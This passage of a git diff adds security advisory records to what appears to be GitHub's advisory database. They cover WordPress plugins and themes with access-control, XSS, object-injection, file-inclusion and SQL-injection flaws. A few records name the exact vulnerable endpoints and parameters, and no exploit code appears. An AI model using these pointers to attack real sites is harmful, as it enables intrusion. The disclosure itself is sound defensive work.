"https://patchstack.com/database/Wordpress/Plugin/upi-qr-code-payment-for-woocommerce/vulnerability/wordpress-upi-qr-code-payment-gateway-for-woocommerce-plugin-1-5-1-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5h9r-fr4c-2vwr/GHSA-5h9r-fr4c-2vwr.json b/advisories/unreviewed/2026/02/GHSA-5h9r-fr4c-2vwr/GHSA-5h9r-fr4c-2vwr.json new file mode 100644 index 0000000000000..b638bab3f2623 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5h9r-fr4c-2vwr/GHSA-5h9r-fr4c-2vwr.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5h9r-fr4c-2vwr", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67993" + ], + "details": "Missing Authorization vulnerability in Vito Peleg Atarim atarim-visual-collaboration allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Atarim: from n/a through <= 4.2.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67993" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/atarim-visual-collaboration/vulnerability/wordpress-atarim-plugin-4-2-1-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5j3p-mg5x-539j/GHSA-5j3p-mg5x-539j.json b/advisories/unreviewed/2026/02/GHSA-5j3p-mg5x-539j/GHSA-5j3p-mg5x-539j.json new file mode 100644 index 0000000000000..0913f69239cb2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5j3p-mg5x-539j/GHSA-5j3p-mg5x-539j.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5j3p-mg5x-539j", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68847" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in itex iSape isape allows Reflected XSS.This issue affects iSape: from n/a through <= 0.72.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68847" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/isape/vulnerability/wordpress-isape-plugin-0-72-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5ppr-f7g3-89cw/GHSA-5ppr-f7g3-89cw.json b/advisories/unreviewed/2026/02/GHSA-5ppr-f7g3-89cw/GHSA-5ppr-f7g3-89cw.json new file mode 100644 index 0000000000000..e8c89a7f6ed5a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5ppr-f7g3-89cw/GHSA-5ppr-f7g3-89cw.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5ppr-f7g3-89cw", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22345" + ], + "details": "Deserialization of Untrusted Data vulnerability in A WP Life Image Gallery – Lightbox Gallery, Responsive Photo Gallery, Masonry Gallery new-image-gallery allows Object Injection.This issue affects Image Gallery – Lightbox Gallery, Responsive Photo Gallery, Masonry Gallery: from n/a through <= 1.6.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22345" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/new-image-gallery/vulnerability/wordpress-image-gallery-lightbox-gallery-responsive-photo-gallery-masonry-gallery-plugin-1-6-0-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5w67-c6pv-hmpq/GHSA-5w67-c6pv-hmpq.json b/advisories/unreviewed/2026/02/GHSA-5w67-c6pv-hmpq/GHSA-5w67-c6pv-hmpq.json new file mode 100644 index 0000000000000..ae531b18039a8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5w67-c6pv-hmpq/GHSA-5w67-c6pv-hmpq.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5w67-c6pv-hmpq", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-69294" + ], + "details": "Deserialization of Untrusted Data vulnerability in fuelthemes PeakShops peakshops allows Object Injection.This issue affects PeakShops: from n/a through <= 1.5.9.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69294" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/peakshops/vulnerability/wordpress-peakshops-theme-1-5-9-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5xcj-44v8-p2v3/GHSA-5xcj-44v8-p2v3.json b/advisories/unreviewed/2026/02/GHSA-5xcj-44v8-p2v3/GHSA-5xcj-44v8-p2v3.json new file mode 100644 index 0000000000000..12920820315dd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5xcj-44v8-p2v3/GHSA-5xcj-44v8-p2v3.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5xcj-44v8-p2v3", + "modified": "2026-02-20T18:31:40Z", + "published": "2026-02-20T18:31:40Z", + "aliases": [ + "CVE-2026-2848" + ], + "details": "A flaw has been found in SourceCodester Simple Responsive Tourism Website 1.0. Affected by this vulnerability is an unknown functionality of the file /classes/Master.php?f=register of the component Registration. This manipulation of the argument Username causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2848" + }, + { + "type": "WEB", + "url": "https://github.com/anupeng/CVE/issues/1" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347084" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347084" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753967" + }, + { + "type": "WEB", + "url": "https://www.sourcecodester.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5xr7-h2jm-xhr2/GHSA-5xr7-h2jm-xhr2.json b/advisories/unreviewed/2026/02/GHSA-5xr7-h2jm-xhr2/GHSA-5xr7-h2jm-xhr2.json new file mode 100644 index 0000000000000..5d77534fde10f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5xr7-h2jm-xhr2/GHSA-5xr7-h2jm-xhr2.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5xr7-h2jm-xhr2", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-69063" + ], + "details": "Missing Authorization vulnerability in Saad Iqbal New User Approve new-user-approve allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects New User Approve: from n/a through <= 3.2.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69063" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/new-user-approve/vulnerability/wordpress-new-user-approve-plugin-3-2-0-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6262-6vhm-9x8v/GHSA-6262-6vhm-9x8v.json b/advisories/unreviewed/2026/02/GHSA-6262-6vhm-9x8v/GHSA-6262-6vhm-9x8v.json new file mode 100644 index 0000000000000..fcd99fa694ca1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6262-6vhm-9x8v/GHSA-6262-6vhm-9x8v.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6262-6vhm-9x8v", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-24948" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in fox-themes Reflector reflector-plugins allows Reflected XSS.This issue affects Reflector: from n/a through <= 1.2.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24948" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/reflector-plugins/vulnerability/wordpress-reflector-plugin-1-2-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-62hw-x3qq-c7vv/GHSA-62hw-x3qq-c7vv.json b/advisories/unreviewed/2026/02/GHSA-62hw-x3qq-c7vv/GHSA-62hw-x3qq-c7vv.json new file mode 100644 index 0000000000000..1ba5359ab6e42 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-62hw-x3qq-c7vv/GHSA-62hw-x3qq-c7vv.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-62hw-x3qq-c7vv", + "modified": "2026-02-20T18:31:40Z", + "published": "2026-02-20T18:31:40Z", + "aliases": [ + "CVE-2026-27506" + ], + "details": "SVXportal version 2.5 and prior contain a stored cross-site scripting vulnerability in the user profile update workflow (user_settings.php submitting to admin/update_user.php). Authenticated users can store malicious HTML/JavaScript in fields such as Firstname, lastname, email, and image_url, which are later rendered without adequate output encoding in the administrator interface (admin/users.php), resulting in JavaScript execution in an administrator's browser when the affected page is viewed.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27506" + }, + { + "type": "WEB", + "url": "https://github.com/sa2blv/SVXportal/blob/master/admin/update_user.php" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/svxportal-admin-update-user-php-stored-xss" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-62jc-vj7m-2q9x/GHSA-62jc-vj7m-2q9x.json b/advisories/unreviewed/2026/02/GHSA-62jc-vj7m-2q9x/GHSA-62jc-vj7m-2q9x.json new file mode 100644 index 0000000000000..de869971bb63d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-62jc-vj7m-2q9x/GHSA-62jc-vj7m-2q9x.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-62jc-vj7m-2q9x", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22363" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Rhodos rhodos allows PHP Local File Inclusion.This issue affects Rhodos: from n/a through <= 1.3.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22363" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/rhodos/vulnerability/wordpress-rhodos-theme-1-3-3-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-62mp-mc96-vv2w/GHSA-62mp-mc96-vv2w.json b/advisories/unreviewed/2026/02/GHSA-62mp-mc96-vv2w/GHSA-62mp-mc96-vv2w.json new file mode 100644 index 0000000000000..7af2dbb8ac7a0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-62mp-mc96-vv2w/GHSA-62mp-mc96-vv2w.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-62mp-mc96-vv2w", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69303" + ], + "details": "Missing Authorization vulnerability in modeltheme ModelTheme Framework modeltheme-framework allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ModelTheme Framework: from n/a through <= 1.9.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69303" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/modeltheme-framework/vulnerability/wordpress-modeltheme-framework-plugin-1-9-2-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-63pr-8qvw-vfv9/GHSA-63pr-8qvw-vfv9.json b/advisories/unreviewed/2026/02/GHSA-63pr-8qvw-vfv9/GHSA-63pr-8qvw-vfv9.json new file mode 100644 index 0000000000000..775e02a6e6706 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-63pr-8qvw-vfv9/GHSA-63pr-8qvw-vfv9.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-63pr-8qvw-vfv9", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68023" + ], + "details": "Missing Authorization vulnerability in Addonify Addonify – Compare Products For WooCommerce addonify-compare-products allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Addonify – Compare Products For WooCommerce: from n/a through <= 1.1.17.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68023" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/addonify-compare-products/vulnerability/wordpress-addonify-compare-products-for-woocommerce-plugin-1-1-17-settings-change-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-63v8-38hf-jrfm/GHSA-63v8-38hf-jrfm.json b/advisories/unreviewed/2026/02/GHSA-63v8-38hf-jrfm/GHSA-63v8-38hf-jrfm.json new file mode 100644 index 0000000000000..09c5bcebbaacf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-63v8-38hf-jrfm/GHSA-63v8-38hf-jrfm.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-63v8-38hf-jrfm", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69392" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in itex iMoney imoney allows Reflected XSS.This issue affects iMoney: from n/a through <= 0.36.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69392" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/imoney/vulnerability/wordpress-imoney-plugin-0-36-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6562-26mh-56xr/GHSA-6562-26mh-56xr.json b/advisories/unreviewed/2026/02/GHSA-6562-26mh-56xr/GHSA-6562-26mh-56xr.json new file mode 100644 index 0000000000000..38956b4b5bb5f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6562-26mh-56xr/GHSA-6562-26mh-56xr.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6562-26mh-56xr", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69387" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in whatwouldjessedo Simple Retail Menus simple-retail-menus allows PHP Local File Inclusion.This issue affects Simple Retail Menus: from n/a through <= 4.2.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69387" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/simple-retail-menus/vulnerability/wordpress-simple-retail-menus-plugin-4-2-1-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-66q7-4wcm-7r85/GHSA-66q7-4wcm-7r85.json b/advisories/unreviewed/2026/02/GHSA-66q7-4wcm-7r85/GHSA-66q7-4wcm-7r85.json new file mode 100644 index 0000000000000..e70563b0aac3c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-66q7-4wcm-7r85/GHSA-66q7-4wcm-7r85.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-66q7-4wcm-7r85", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22354" + ], + "details": "Deserialization of Untrusted Data vulnerability in Dotstore Woocommerce Category Banner Management banner-management-for-woocommerce allows Object Injection.This issue affects Woocommerce Category Banner Management: from n/a through <= 2.5.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22354" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/banner-management-for-woocommerce/vulnerability/wordpress-woocommerce-category-banner-management-plugin-2-5-1-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6c3h-gxfp-37vm/GHSA-6c3h-gxfp-37vm.json b/advisories/unreviewed/2026/02/GHSA-6c3h-gxfp-37vm/GHSA-6c3h-gxfp-37vm.json index 0903674e21afe..3fd12c85e8604 100644 --- a/advisories/unreviewed/2026/02/GHSA-6c3h-gxfp-37vm/GHSA-6c3h-gxfp-37vm.json +++ b/advisories/unreviewed/2026/02/GHSA-6c3h-gxfp-37vm/GHSA-6c3h-gxfp-37vm.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-6c3h-gxfp-37vm", - "modified": "2026-02-19T18:31:51Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:51Z", "aliases": [ "CVE-2026-23547" ], "details": "Missing Authorization vulnerability in cmsmasters CMSMasters Content Composer cmsmasters-content-composer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects CMSMasters Content Composer: from n/a through <= 2.5.8.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:12Z" diff --git a/advisories/unreviewed/2026/02/GHSA-6frj-85f5-897h/GHSA-6frj-85f5-897h.json b/advisories/unreviewed/2026/02/GHSA-6frj-85f5-897h/GHSA-6frj-85f5-897h.json new file mode 100644 index 0000000000000..658dcc6e56cbf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6frj-85f5-897h/GHSA-6frj-85f5-897h.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6frj-85f5-897h", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69397" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeREX Tint tint allows PHP Local File Inclusion.This issue affects Tint: from n/a through <= 1.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69397" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/tint/vulnerability/wordpress-tint-theme-1-7-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6fwh-vwxr-5jrw/GHSA-6fwh-vwxr-5jrw.json b/advisories/unreviewed/2026/02/GHSA-6fwh-vwxr-5jrw/GHSA-6fwh-vwxr-5jrw.json new file mode 100644 index 0000000000000..f1f59267b39a9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6fwh-vwxr-5jrw/GHSA-6fwh-vwxr-5jrw.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6fwh-vwxr-5jrw", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67974" + ], + "details": "Missing Authorization vulnerability in WP Legal Pages WPLegalPages wplegalpages allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WPLegalPages: from n/a through <= 3.5.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67974" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wplegalpages/vulnerability/wordpress-wplegalpages-plugin-3-5-4-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6g49-x6hq-6rmq/GHSA-6g49-x6hq-6rmq.json b/advisories/unreviewed/2026/02/GHSA-6g49-x6hq-6rmq/GHSA-6g49-x6hq-6rmq.json new file mode 100644 index 0000000000000..8d93ed6da314b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6g49-x6hq-6rmq/GHSA-6g49-x6hq-6rmq.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6g49-x6hq-6rmq", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68000" + ], + "details": "Missing Authorization vulnerability in PickPlugins Testimonial Slider testimonial allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Testimonial Slider: from n/a through <= 2.0.15.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68000" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/testimonial/vulnerability/wordpress-testimonial-slider-plugin-2-0-15-broken-access-control-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6qvx-865f-qrhf/GHSA-6qvx-865f-qrhf.json b/advisories/unreviewed/2026/02/GHSA-6qvx-865f-qrhf/GHSA-6qvx-865f-qrhf.json new file mode 100644 index 0000000000000..85be695dfdd6e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6qvx-865f-qrhf/GHSA-6qvx-865f-qrhf.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6qvx-865f-qrhf", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:32Z", + "aliases": [ + "CVE-2024-34438" + ], + "details": "Missing Authorization vulnerability in Anssi Laitila Shared Files shared-files.This issue affects Shared Files: from n/a through <= 1.7.19.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34438" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/shared-files/vulnerability/wordpress-shared-files-plugin-1-7-19-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:21:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6rr6-99p5-684x/GHSA-6rr6-99p5-684x.json b/advisories/unreviewed/2026/02/GHSA-6rr6-99p5-684x/GHSA-6rr6-99p5-684x.json new file mode 100644 index 0000000000000..aebd5a2dc6802 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6rr6-99p5-684x/GHSA-6rr6-99p5-684x.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6rr6-99p5-684x", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2024-50452" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in POSIMYTH Nexter Blocks the-plus-addons-for-block-editor allows Stored XSS.This issue affects Nexter Blocks: from n/a through <= 3.3.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50452" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/the-plus-addons-for-block-editor/vulnerability/wordpress-nexter-blocks-plugin-3-3-3-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6v87-78cw-pw29/GHSA-6v87-78cw-pw29.json b/advisories/unreviewed/2026/02/GHSA-6v87-78cw-pw29/GHSA-6v87-78cw-pw29.json new file mode 100644 index 0000000000000..e91bfff082e87 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6v87-78cw-pw29/GHSA-6v87-78cw-pw29.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6v87-78cw-pw29", + "modified": 